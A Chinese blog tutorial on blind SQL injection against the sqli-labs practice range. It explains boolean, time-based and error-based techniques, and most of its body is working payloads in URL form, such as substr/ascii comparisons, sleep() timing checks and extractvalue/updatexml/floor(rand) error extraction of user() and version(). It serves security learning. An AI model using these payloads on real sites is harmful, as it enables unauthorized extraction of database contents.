sql注入-盲注

最新推荐文章于 2024-06-19 13:35:01 发布
最新推荐文章于 2024-06-19 13:35:01 发布
阅读量3k 收藏 1
点赞数 2
分类专栏: 渗透测试 文章标签: sql 安全 web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36591264/article/details/121748608
版权

学习内容:

布尔盲注
时间盲注
报错盲注

SQL注入-盲注

前言

何为盲注?盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从 background-1 中,我们可以知道盲注分为三类
•基于布尔 SQL 盲注
•基于时间的 SQL 盲注
•基于报错的 SQL 盲注
注:使用靶场:sqli-labs
靶场下载地址:https://github.com/Audi-1/sqli-labs

一、基于布尔盲注

盲注前首先需要了解mysql中字符串截取相关的操作:
△ mid(), substr(),用法相同
substr(str,pos1,pos2);
从pos1开始截取str字符串到pos2位置,下标从1开始
例:substr(database(),1,1)='s'
http://127.0.0.1/sqlilabs/Less-5/?id=1' and substr(database(),1,1)='s' --+

△ left(str,pos)
从str左边开始截取pos长度
例:left(database(),1)='s'
http://127.0.0.1/sqlilabs/Less-5/?id=1' and left(database(),1)='s'--+

△ ascii(), ord() 将字符串转换为ascii类型
例:http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))=115 --+

ascii表


△ regexp 正则
正则注入介绍:https://www.cnblogs.com/lcamry/articles/5717442.html
例:select user() regexp ‘^[a-z]’
select user() regexp ‘^ro’
http://127.0.0.1/sqlilabs/Less-5/?id=1’ and 1=(if((user() regexp ‘^r’),1,0))–+
http://127.0.0.1/sqlilabs/Less-5/?id=1’ and 1=(user() regexp ‘^ro’)–+

△ like 注入
例:select user() like ‘ro%’
http://127.0.0.1/sqlilabs/Less-5/?id=1’ and 1=(user() like ‘ro%’)–+

二、基于时间盲注

△ if(ascii(substr(database(),1,1))>114,sleep(5),0)
http://127.0.0.1/sqlilabs/Less-5/?id=1' and if(ascii(substr(database(),1,1))>114,sleep(3),1)--+

△ sleep(if(ord(mid(database(),1,1))>114,3,0))
http://127.0.0.1/sqlilabs/Less-5/?id=1' and sleep(if(ord(mid(database(),1,1))>114,3,0))--+

三、基于报错盲注

△ select count(*),concat(0x7e,0x7e,(select user()),0x7e,0x7e,floor(rand(0)*2))a from information_schema.tables group by a;
http://127.0.0.1/sqlilabs/Less-5/?id=1' union select 1,count(*),concat(0x7e,0x7e,(select user()),0x7e,0x7e,floor(rand(0)*2))a from information_schema.tables group by a--+

以上语句可以简化成下面的形式:
http://127.0.0.1/sqlilabs/Less-5/?id=1' union select 1,count(*),3 from information_schema.columns group by concat(version(),floor(rand(0)*2))--+

△ extractvalue(1,concat(0x7e,(select user()),0x7e))
http://127.0.0.1/sqlilabs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select user()),0x7e))--+

△ updatexml(1,concat(0x7e,(select user()),0x7e),1)
http://127.0.0.1/sqlilabs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
小白帽的成长
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
SQL注入之基于布尔的盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
SQL注入——盲注
weixin_74991270的博客
10-10 233
掌握盲注基本的操作多多练习,手工注入+sqlmap跑。
sql注入盲注
weixin_64815500的博客
06-19 965
sql注入关于无回显用到的盲注sqli-labs靶场为例子讲解常用盲注类型以及函数。面试或者打ctf可用作参考
史上最详细的SQL盲注入门教程
weixin_44867191的博客
05-16 1380
正常情况下,用户输入用户名id,就能查到用户信息,但是如果攻击者输入的内容是:666' or '1'='1,那么查询的SQL语句就变成SELECT name,age FROM users WHERE user_id = '666' or '1'='1',由于1=1恒成立,就会执行SQL,执行后,就会返回所有的学生信息,有回显信息,这就是典型的。如果执行SQL后,应用程序不显示任何具体的数据,可能只是告诉我们查询成功或者查询失败,或者什么都不说,没有回显,但是SQL还是执行了,SQL注入发生了,这就是。
SQL注入2——盲注(重学)
qq_52263650的博客
11-07 3786
SQL注入2——布尔型盲注(重学)
SQL注入(盲注)
a12332251的博客
12-07 927
SQL
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
【网络安全-实验七-SQL注入-盲注+sqlmap使用】 SQL注入是一种常见的网络攻击方式,它通过在应用程序的输入参数中嵌入恶意SQL代码,从而控制或篡改数据库的行为。在这个实验中,我们将深入理解SQL注入盲注类型,并...
SQL注入技巧-盲注暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的盲注技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
SQL注入手动盲注案例
05-30
### SQL注入手动盲注案例详解 #### 一、SQL注入概念 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在应用程序的输入字段中插入恶意SQL语句来操纵或窃取数据库中的信息。手动盲注是一种高级技巧,适用于...
SQL注入-概述-ppt.pptx
10-27
SQL注入是一种常见的网络安全威胁,主要针对使用SQL结构化查询语言)进行数据存储和检索的Web应用程序。这种攻击方式利用了程序设计中的漏洞,使得恶意用户能够通过输入特定的SQL代码,来操纵数据库,获取未经授权...
SQL注入实战:盲注
ting_liang的博客
01-20 721
1、当攻击者利用SQL注入漏洞进行攻击时,有时候web应用程序会显示,后端数据库执行SQL查询返回的错误信息,这些信息能帮助进行SQL注入,但更多时候,数据库没有输出数据web页面,这是攻击者会查询一系列的true或false问题,或者基于时间判断的问题,强制从数据库获取数据。利用if(条件,0,1)函数,当条件为真返回0,假则返回1。基于布尔型的盲注,我们通常采用下面的方法猜解字符串,3、盲注可以分为基于不二的盲注和基于事件的盲注。1、延时注入,用的最多的注入。
SQL注入盲注
xiao_he0123的博客
03-20 7003
SQL注入盲注前言一、盲注分类二、具体解析1.基于布尔的sql盲注首先要先了解一下sql注入截取字符串常用的函数:(1)mid()函数(2)substr()函数(3)left()函数具体注入方法2.基于时间的SQL盲注3.基于报错的SQL盲注1.extractvalue()函数2.uodatexml()函数3.floor()函数 前言 何为盲注盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面 一、盲注分类 盲注分为三类: (1)基于布尔的SQL盲注 (2)基于事
sql注入盲注
2302_79119987的博客
04-23 1674
时间盲注又称延迟注入,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。如果页面延迟五秒,说明正确。注入语句与布尔盲注相似,但是过程太繁琐一般使用自动化注入。可以使用脚本进行猜测:(使用时做出修改)# 将url 替换成你的靶场关卡网址# 修改两个对应的payload# 目标网址(不带参数)# 猜解长度使用的payload# 枚举字符使用的payload(ascii(substr(,{n},1)) ={r})# 获取长度。
SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用
VictorZhang
07-30 6013
Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https://github.com/webattacker/sqli-labs 将Sqli-labs解压后整个目录拖拽到路劲:C:\wamp64\www 下 3.在浏览器上访问http://localhost...
2,sql注入 , 读文件和写文件
qq_41860876的博客
10-13 774
任务091:手动漏洞挖掘-SQL注入 这个是接着上一个1,SQL注入,查看服务器系统,拿到账号密码。写的 开始实验靶机metasploitable-linux-2.0.0 利用一个函数进行读取系统文件 下面都是用burp进行发送的请求 发送的请求是1234 使用burp看看请求的内容 在burp工具里发送到Repeater模块里 在这里面原始数据直接可以看见发的信息 双击就能修改里面的1234...
SQL 注入-盲注
weixin_53711701的博客
01-30 1752
SQL 注入-盲注
SQL注入漏洞——sql盲注
xiaoheizi的博客
06-12 424
sleep(5) #SQL语句延时执行5秒 substr(a,b,c) #从位置b开始,截取字符串a的c长度 left(database(),1) #left(a,b)从左侧截取a的前b位 length(database())=8 #判断数据库database()名的长度
sql注入布尔盲注流程
最新发布
06-28
SQL注入布尔盲注是一种利用SQL注入技术来检测查询结果是否满足某个条件的攻击方法,它通常在应用程序中用于验证用户输入时使用。以下是SQL注入布尔盲注的基本流程: 1. **识别可注入点**:攻击者首先尝试找出页面上可以接收用户输入的地方,如表单、URL参数等,这些地方可能存在SQL查询。 2. **构造基础查询**:创建一个基本的查询语句,通常是检测一个特定值(例如用户是否存在)的存在,通常是一个简单的`SELECT * FROM table WHERE column = 'value'`。 3. **提交测试数据**:在查询中替换'value'为潜在的恶意输入,例如`'1'`或`'1 OR 1=1'`。'1'会返回所有结果,而`'1 OR 1=1'`在大多数情况下会返回所有数据,因为布尔条件为真。 4. **观察响应**:根据服务器返回的结果,判断原始查询条件是否满足。如果服务器返回预期的结果(如所有数据),则说明条件成立;反之,如果返回空结果或异常,则条件不成立。 5. **迭代调整**:根据响应调整恶意输入,例如尝试否定条件(如`'1 OR 1=0'`),直到找到正确的布尔表达式。 6. **解析结果**:利用布尔表达式的真假来推断数据库中的敏感信息,例如是否存在特定记录、字段值等。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小白帽的成长

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值